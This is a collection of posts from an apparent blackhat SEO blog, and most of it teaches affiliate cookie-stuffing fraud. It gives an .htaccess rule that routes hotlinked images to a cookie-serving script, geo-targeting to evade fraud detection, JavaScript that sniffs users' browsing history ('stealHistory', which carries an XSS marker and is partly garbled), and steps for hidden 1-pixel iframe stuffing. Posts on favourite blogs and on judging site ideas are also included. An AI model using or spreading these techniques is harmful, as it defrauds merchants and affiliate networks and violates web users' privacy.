People are lazy so I write this first
This (research) based post will demonstrate the techniques behind stuffing affiliate cookies via images, on any website you can post images (think forums), how to get other people to do this for you and how to geographically target cookie stuffing.

Zonk. Back in 2007 I did a post about making money with affiliates by cookie stuffing. While nobody admits to cookie stuffing, it turns out you’re all lying shits as that post gets more search traffic than anything else.

Personally, I think cookie stuffing is low, I wouldn’t recommend it or condone it. It’s probably illegal (ebay certainly think so) and you’ll probably go to hell in the afterlife.

Oh, you’ll probably get caught too if you used lame iframe techniques, so for research purposes only I want to explain how to turn cookie stuffing up a notch, if you were silly enough to do such a thing.

iFrames are so 1990s
I’d be quite happy never to see an iframe again, even though I’m sure there’s going to be a rebirth as SEOmoz said it was a possible route to sculpt pagerank after the no-follow actually doesn’t sculpt anything admission from Mr. Cutts.

Yea, so don’t use them.

Serving cookies through images
You can actually serve cookies through images (sort of). It’s a lot more sneaky and it means you can essentially serve a cookie to anywhere you can post HTML.

I’ve seen people propagate this by encouraging people to hotlink as well. So for instance, auto-generating a celebrity photo gallery and offering embed codes. Visitors merrily go about posting images all over the web while they are secretly serving cookies.

So there’s a mechanism to automatically propagate cookies all over the interwebs.

Geo-targeting cookie stuffing
Conversion rate is one (of a few) indicators that are watched to try and rumble cookie stuffers. You need to do everything you can to make sure your conversion rate is as high as possible. So, let’s start with geo-targeting. It’s no good serving cookies to Americans for ebay UK or serving ebay.com cookies for Italians. You get the idea. So detecting what country your visitor is from and serving the correct cookie increases your chance of a cookie stuff vs conversion.

Cookie stuffing images with .htaccess
Okay, we’re going to have to intercept image requests and redirect them to a script to decide if and which cookie to stuff.

The below .htaccess file will grab requests that do not originate from your site or search bots and pass them to a serveimage php file.

Options +FollowSymLinks 

RewriteEngine on 

# Let's not cookie stuff our own visitors!

RewriteCond %{HTTP_REFERER} !^$ [NC]

# If the request is outside of your site

RewriteCond %{HTTP_REFERER} !^http://([^.]+\.)?mywebsite\.com/ [NC]

# If the request is not from a few bots (pretty basic, add to this!)

RewriteCond %{HTTP_USER_AGENT} !(googlebot-image|msnbot|psbot|yahoo-mmcrawler) [NC]

# Grab the image name, extension type, go to our serveimage.php file

RewriteRule ^images/([a-zA-Z0-9]+).(bmp|gif|jpe?g|png)$ /serveimage.php?img=$1&ext=$2 [L]

Cookie stuffing images with PHP
So now we’re passing image requests to serveimage.php, you need to have the following in place:

So this PHP code will take your hotlinker, and 10% of the time stuff an affiliate cookie for the correct country and 90% of the time correctly serve the image.

You can add as many country codes as you like, you can get a list from WorldAtlas.

I’ve personally seen people make over £1,000 per day when they get creative with cookies, obviously the deeper you stick your hand in the cookie jar, the more likely you are to get caught.

Other security measures and improvements
As the more astute among you have no doubt realised, big boy sites have more layers for detecting cookie stuffing, such as:

1) What page do people land on (always the same page being hit?)

2) How long do they stay on the site on average

3) How many / which pages do they view

4) Some sites double serve a verification file, such as a tiny gif and cross-check you have the image and the cookie

Some of the basic stuff like user agent / IP are covered in this script, but on any scale you’d need to tackle the above issues. Yes, it’s totally possible – just remember, if a human can do it in a browser, you can write a script to do it as well.

Get creative – check the browser history
If you want to raise conversion rates even further, you can check that they’ve visited the site you want to cookie stuff for. If they’ve previously visited the site, it’s much more likely they’ve got an account and are likely to buy.

Here’s some Javascript to check user history (I didn’t write this one)

var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
  "http://list.com/",
  "http://of.com/",
  "http://sites.com/",
  "http://you.com/",
  "http://want.com/",
  "http://to.com/",
  "http://check.com/",
  "http://users.com/",
  "http://history.com/",
  "http://for.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {

  var d = document.createElement('div');
  d.id = 'xss_flag';
  document.body.appendChild(d);

  var d = document.createElement('table');
  d.border = 0;
  d.cellpadding = 5;
  d.cellspacing = 10;
  d.width = '90%';
  d.align = 'center';
  d.id = 'data';
  document.body.appendChild(d);

  document.write('');
  for (var i = 0; i <>');

  /* launch steal history */

if (is_mozilla) {
  stealHistory();
}

}

function stealHistory() {

  // loop through websites and check which ones have been visited
  for (var i = 0; i < websites.length; i++) {          
         var link = document.createElement("a");       
         link.id = "id" + i;       
         link.href = websites[i];       
         link.innerHTML = websites[i];              
         document.body.appendChild(link);       
         var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");       
         document.body.removeChild(link);       
// check for visited       
     if (color == "rgb(0, 0, 255)") {           
         document.write('' + websites[i] + '');
      } // end visited check
  
  } // end visited website loop

} // end stealHistory method

I hope this post helps merchants and affiliate networks everywhere to tackle cookie stuffers. I’ll do a followup at some point explaining how to mimic user browsing behavior properley.

End thought: Web based e-mail clients can also load images. Chain mails still do well…..

I’ve never done a round-up of the blogs I read before, which I guess is a bit selfish. So, in no particular order (and this isn’t a complete list) some of my favourite blogs, if you’re looking for some inspiration.

Dark SEO Programming is run by Harry. As he puts it, “SEO Tools. I make ‘em”. A great guy if you need help with coding and somewhat of a captcha guru, with a sense of humour. Definitely worth keeping up with. I wouldn’t be surprised if this guy starts making big Google waves in the next few years.

Ask Apache is a blog I absolutely love. Great, detailed tutorials on script optimisation, advanced SEO and mod_rewrite. AskApache’s blog posts are the kind of ones that live in your bookmarks, rather than your RSS Reader.

Andrew Girdwood is a great chap from BigMouthMedia I met last year (although I very much doubt he remembers that). Andrew seems to be a vigilante web bug hunter. What I like about his blog is that he is usually the first to find weird things with Google that are going down. This usually gets my brain rolling in the right direction of my next nefarious plan. ^_^

Blackhat SEO Blog run by busin3ss is always worth checking out. He was even kind enough to give me a pre-release copy of YACG mass installer to review (it’s coming soon – I’m still playing!). Apart from his excellent tools, his blog features the darker side of link building, which of course, interests me greatly.

Kooshy is a blog run by a guy I know, who.. Well I think he wants to remain anonymous (at least a little). He’s just got started again after closing down his last blog and moving Internet personas (doesn’t the mystery just rivet you?). Anyway, get in early, I think we can expect some good stuff from here. He’s already done a cool post on Pimpin’ Duplicate Content For Links.

Jon Waraas is run by.. Can you guess? Jon has something that a lot of even really smart Internet entrepreneurs are missing, good old fashioned elbow grease. This guy is a workaholic and it pays off in a big way. Apart from time saving posts on loads of different ways to monetise your site, build backlinks and flush out your competitors I get quite a lot of inspiration for his constant stream of effort and ideas. I could definitely take a leaf out of his work ethic book.

Blue Hat SEO is becoming one of the usual suspects really. If you’re here, you probably already know about Eli. Being part of my “let’s only do a post every few months club”, I love Eli’s blog because there is absolutely no fluff. He gets straight down to the business of overthrowing Wikipedia, exploiting social media and answering specific SEO questions. You’ll struggle to find higher quality out there.

SEO Book is probably the most “famous” blog I’m going to mention here. Aaron was off at a disadvantage, because to be honest, I thought he was a massive waste of space for quite a while. (I guess that’s what happens when you take your SEO youth on Sitepoint listening to the people with xx,xxx posts on there). I bought his SEO Book and for me, at least, it was way too fluffy. I’m pleased he’s started an SEO training service now as it represents much better value. I’m sure he was making a lot of money from his SEO Book, but perhaps milked it too long (like I probably would have). Anyway, I kept with his blog and I’ve been impressed with his attitude and posts. He’s done some really cool stuff, like the SEO Mindmap and more recently, a keyword strategy flowchart which would be useful for those looking to a more structured search approach. He’s also written about algorithm weightings for different types of keywords and of course has some useful SEO Tools.

Slightly Shady SEO – Great name, great blog. Although XMCP will probably take it as an insult, I’ve always regarded Slightly Shady as the blog most similar to mine on this list. Maybe it’s because I wish I’d written some of the posts he has, before he did, hehe. Again, a no BS approach to effective SEO, whether he’s writing about Google’s User Data Empire, hiding from it or site automation it’s all gravy.

The Google Cache is a great blog for analytical approaches to SEO. There are some awesome posts on Advanced Whitehat SEO and using proxies with search position trackers. I like.

SEOcracy is run by a lovely database overlord called Rob. Rob’s a cool guy, he was kind enough to donate some databases to include in the Digerati Blackbox a while back. Most of his databases are stashed away in his content club now, which is well worth a look in. He’s also done some enlightening posts on keyword research, stuffing website inputs and Google Hacking.

This is all I’ve got time for now, apologies if I’ve missed you. There may be a Part II in the near future.

Last month I wrote an article called Making Dirty Money From Affiliates With Cookie Stuffing, which for those of who you didn’t read it, basically outlined a technique to deliver your affiliate cookie to loads of people, grabbing affiliate commissions you didn’t really earn.

As I expected, there was mixed reaction, some people taking the information onboard and others calling for me to be burnt at the stake. Whatever. I thought it would interest the nay-sayers to post an update on a cookie stuffing experience.

A good friend of mine thought he’d give cookie stuffing a try. So he started delivering cookies on an e-commerce site he had, as well as a video blog.

In short, he made over £1,000 in two weeks from using this technique. Then he got caught.

Exactly as I predicted – even a major affiliate network (commission junction), working with some major merchants (ebay), did absolutely fuck all. He got a rather polite e-mail from CJ, highlighting his cookie stuffing code and was asked if he could please remove it within the next seven days – that’s it. He gets to keep his £1,000 he made.

So for all of you who moan about blackhats, you should be directing some of the blame to the affiliate networks who let people get away with this. They are just as greedy as the blackhats after some extra coffee cash!

Some interesting points about the cookie stuffing programme he ran:

• He only got caught because he got cocky, making linkbait articles, submitting to Digg then getting thousands of cookies delivered – my hunch is a Digger saw the code (after a status bar flash of the iframe) and reported him
• The most successful cookie stuffing was on the e-commerce site, which he was making approximately £40 per 1000 visitors, which goes to show the power of the “ready to buy” mindset.
• The linkbait articles got tens of thousands of visitors but made very little per 1,000 visitors
• He only cookie stuffing 2 affiliates (but large ones)

Affiliate networks could really stamp out this behaviour if they suspended payments of cookie stuffers and banned their accounts, but they don’t. They want money just as much as everyone else.

I’ve kept details light on his cookie stuffing activities as I don’t want to identify his sites and maybe get him in more trouble (:

Every single day I probably come up with three or four new ideas for websites. Every single year, I probably come up with three or four good ideas for websites. So how do you separate “good” ideas from “notsogood” ideas? There’s definitely a process, which most experienced developers/marketers do without even realising it. I’m going to try and outline my thought process and some of the tools I use to judge whether ideas make it to the web or to the recycle bin.

Consideration 1: Has it been done before?
Sounds obvious, huh? I really hate pissing on peoples’ parades, but working as a consultant I’m probably approaching triple figures for the amount of times when I’ve been told about the “next big thing”, only to have to show people a Google search result page with a dozen established websites already.

If you’re planning a fairly large project, it really does pay to load up Google and hammer it with everything you can think of which might possibly be related to your idea. Oh, your idea’s been done before? No, biggie – My mantra here is: Do it different, or do it better!

Different? That doesn’t just mean the core idea! For instance, you could do the basic idea but target it at a different audience. A great example of this is Sphinn.

Well, here’s the thing – there’s isn’t really a “Sphinn versus Digg”. Sphinn isn’t very much different from Digg at all, however it is aimed at Internet Marketers, which is a crowd that isn’t always welcomed with open arms over at Digg. It seems obvious now, but what would your first reaction be in a pre-Sphinn world if someone came to you and said “I’ve got this idea for a website, it’s a social site where people vote on news stories and…”? It would have been very easy to scrap the idea without further thought.

Better? Surf the web looking for opportunities, just how Danny realised that Digg could be better for search marketers, I could go and find a list of 10 sites now which I could use and say “this really could be better if…” – that’s where these “simple but great” ideas come from. Who 2 years ago thought MySpace would be being dominated by other social network site?

Facebook was not designed as a competitor to MySpace, it began it’s life in the halls of Harvard as a way for students to connect with each other. The idea slowly expanded to more ivy league schools, then universities, then companies, until it has reached its colossal size today. The idea started out with similar premise to MySpace, but again a different audience. It just so turns out it performs the function of MySpace, but in a much better way: Greater connectivity and less spam (for at now at least).

This is one of the reasons we can see MySpace’s brand searches suffer in Google as people leave in their droves and head for Facebook. You can see around 2007 MySpace really began to suffer and has started to decline in search popularity, which spells out a bleak future for them. I don’t want to get into a big MySpace vs. Facebook debate, I want to say: it doesn’t matter how big your competitor is, if you can do something genuinely better, you’ve got a chance.

Consideration 2: Intelligent monetisation

There are a whole bunch of ways you can make money from a website and one of the biggest mistakes I see is people just defaulting to the Adsense crutch. Don’t get me wrong, I’m a big Adsense fan, but it has its uses and it’s certainly not a silver bullet solution for monetisation.

Before you even get into monetisation, you should ask yourself the question; should you be trying to monetise a site from the kick off anyway? Obvious monetisation can adversely effect the credibility of your site, or worse yet – drive users away as you sell off the traffic that you’ve worked so hard to draw in.

I’ve mentioned before, I don’t use Adsense on this blog – and I think it’s a pretty good example. I don’t do sponsored posts, sell links or show Adsense because all of these things would drive users away from my blog, which I’m writing to get them here in the first place! I want you here to read this information, not con you into coming here for a few vague tips just so I can pawn you off to the highest bidder.

I imagine most of my readers will know about Adsense, so most probably won’t click on it anyway – so I won’t make much money. I guess I could blend it in and maybe get a few misclicks, but what’s the point in that? When I recommend certain products, or schemes I sometimes use an affiliate link, which I mark as (aff) to let people know what it is. This way, I add value to readers, not trying to get them to buy/subscribe/use something that’s not relevant to the post. If they have to look at it anyway, why not use an affiliate link? They would perform that action anyway. Marking the links with (aff) is just my way of communicating to my readers that they have the option of typing in the URL if they really don’t want me to get a commission – that’s their choice at the end of the day.

If you can “build in” a monetisation stream to your site, i.e. make it part of the integral process that 1) does not require the user to do more than they usually would and 2) still sees the user perform the actions you want them to, you’re on a winner.

There are tertiary methods of generating revenue, which can be very lucrative – but will never be core to functionality, such as CPM (cost per thousand impression) banners. If you run a community based website with 1000 uniques per day and an average of 10 page views, there’s a fair bit of money to be had from site-wide CPM advertising. There’s even more money to be had if you can directly sell these banner impressions to interested parties, rather than the sometimes rather low-paying CPM networks.

Do you like banners, though? When was the last time you went to a site and you thought “Wow, I’m really pleased that banner advert is there!” Rarely, probably never. As a rule of thumb people don’t like banners – however, they can pay the bills, so there has to be some kind of balance.

In the above example, we’re talking about building a community site, which is a damn hard thing to do – to reach that “critical mass” of users, where your user count will self-replicate and you don’t have to have your foot on the pedal to keep the thing alive. So, at these tender stages of your website’s life, is it a good idea to expose people to banner adverts? Unlikely.

Monetisation can be a bit of a gamble and there’s loads of examples we could work through, but there’s a few key rules to keep in mind:

1) Can you integrate your monetisation into the core functionality of your site?

2) Should you be using “push” monetisation straight away?

3) How will your users react and interact with different monetisation streams?

4) How do other sites in your niche monetisation their presence?

5) What actions do you want a user to take on your site and does your monetisation work against these?

6) Have you considered:

> Affiliate deals to monetise content
> Contextual advertising such as Adsense, Adbrite, PeakClick? (CPC)
> Cost per thousand impression (CPM) advertising such as TribalFusion, Casale, BurstMedia
> Having other sites or companies sponsor sections of your website?
> Does your site give to voluntary donations?
> What about subscription based systems?
> Can you monetise RSS or syndicated feeds?
> Can you do sponsored content? (Nofollowed of course!)

What I’m tarting on about is that you can’t make anything without visitors, so put them first. Maybe I should have just written that half an hour ago? (:

Consideration 3: Time vs Profit Ratio

Avid readers of my blog (I love you guys), will know I’m a big fan of “quick buck” ideas. These are ideas which are quick and easy to implement and will earn you a bit of pocket money. When building a web portfolio, diversification is the key factor to income stability. Although I have a few “battleship” sites, I’ve also got a million dingys floating about, so if a few Google bombs go off here and there, I’m still in pretty good shape.

A lot of people ask the question “I want to make money online, should I make one big site, or loads of little ones?” My answer is, both! (and everything between them for that matter). Small sites are a great way of testing ideas, monetisation streams, SEO techniques, designs, you name it. You can increase your overall chance of success by lowering risks early on. If you spend all of your time, money and resources on building your first battleship site and for whatever reason, it sinks – that leaves you in a nasty place. If you can get up and running with a few quick wins, you can use this revenue as a “margin of error” to play with when working on larger projects.

My most successful “dingy” site took about 20 minutes to build, about 20 minutes of promotion and it makes about $300 a month, with no work whatsoever. I’d say that’s a pretty good investment, by whatever yardstick you’re using. So what makes a “dingy” site?

It’s not size that’s for sure. Some of the quickest projects may be database driven sites with a million pages that are built just to catch long-tail queries. I generally class a site by three factors:

1) How long it will take to build, design and develop

2) How many visitors it will take to make the site consistently earn money

3) What ongoing maintenance and time will the site take?

The first is fairly simple and easily written off. If you’re confident you can design and develop the site, you’re onto a winner. A lot of the time, it’s easy to pick up a CMS such as WordPress, Drupel, Joomla or Pligg to smack a site together in no time. A real issue is how many visitors is it going to take to make the site earn money? This depends on our earlier points about monetisation streams, if you’re relying on CPM – it will take a hell of a lot, if you’re relying on single high paying affiliate commissions, probably not so many.

The most important by far for me, is what time, on an ongoing basis will this site eat up? As much as I love community type sites, they take a bastard amount of TLC to get off the ground. With many projects on the go, you really need to do some time planning to make sure you’ve got enough spare (or can outsource), to see these things through. An early mistake I made was building loads of sites and not giving them the attention they needed to grow. You won’t be getting a second chance to impress with a lot of visitors, so make sure you’ve got resources to spare to make it work first time round.

If however, you spend a little more time, you’ll see there are loads of drag and drop projects that you can set up and leave running at no more time expenditure.. Quick wins, like Google navigation queries (:

I hope these seeds give you some solid logic to build on. To be honest, I was going to do a top 5, but I’ve just moved house and I’m on “free city wifi” until I get broadband installed here. Unfortunately “free shitty wifi” would be more accurate as I’m getting about 33.6kbps modem speeds (remember them??). Oh, I’ve also got some dingys to inflate (:

A beautiful introduction
Well, this is down-right dirty, nasty stuff. I had an idea a while back how to skim some money from affiliates and I was surprised that nobody had thought of it before. After a bit of Googling, I of course found – it actually has been done before (: However, there’s not overly much written about it so I’m going to do a little bit of blogging on the subject.

Before you read this, if you’re one of those whiter than white, whitehats who thinks people shouldn’t even blog about blackhat stuff and you’re already desperately trying to open whatever linux based, environmentally friendly, open-source mail client it is you use to flame me, you should probably know that all you’ll achieve is you’ll make my laugh and I’ll probably post it for the world to see. (: Besides, my “ethics” behind this is if we make enough noise about blackhat techniques and lots of people use them, they will have to be fixed and the Internets will be a better place for all. It just so happens you can make filthy money in the process.

Here’s the coolest thing about this technique: It requires almost no technical knowledge and you can set it up in minutes.

Here’s the not-so-cool thing about this technique: If you have any morals or anything like that, you’re going to have to put them in a box for now. Throw the box in the river, then throw the river into space.

What’s the plan?
Dead simple: Earn affiliate commission that we’re not really meant to by giving people our cookie.

I can do this in 2 steps?
Yes, it’s dead easy:

Step 1: Sign up to every affiliate programme going. You can try the big ones like Amazon and Ebay, but generally you’ll have more luck going through an affiliate scheme that’s running though an affiliate network. The reasoning here is that Amazon, Ebay and all the big players run their own affiliate schemes directly. If you’re caught nicking pennies off them, you’ll probably get banned pretty quick (although I ran some pretty large tests doing this and never heard a so much as a peep from either of them).

Going through an affiliate network is a lot easier. Basically, if you’re stuffing all these cookies onto visitors computers, you’re making the affiliate network a bunch of cash. Guess what, they’re in business to make cash and they really aren’t going to bust your balls unless they have a merchant complain. If you read through most of the affiliate networks TOS, you normally find a clause like “If we ever actually get around to bothering to see why a particular affiliate is earnings thousands of pounds a week while we aren’t tracking any clicks, we’ll probably give you some type of slap on the wrist via e-mail. This is assuming we can move the cash out of the way of our gold-plated keyboards.”

Step 2: All we have to do now is take all of our referral URLs and stick them in a 1pixel (invisible) iframe on every webpage we have control over. The higher the traffic the better! Don’t have any high traffic websites? Ahh, c’mon! Generating traffic isn’t hard – make some linkbait and stick it the code on that page! Get 50,000 visitors from Digg, you think maybe Digg users shop online? Damn straight they do! Or have you considered hub sites that allow you to put your own HTML in?….

The possibilities are endless, anywhere you can stick an iframe, you can drop your 30-day cookie onto a machine. Did I mention it’s almost Christmas? I hear more people buy stuff online around now.

I’ll let you be creative with how you use this. Don’t shoot the messenger. ^_^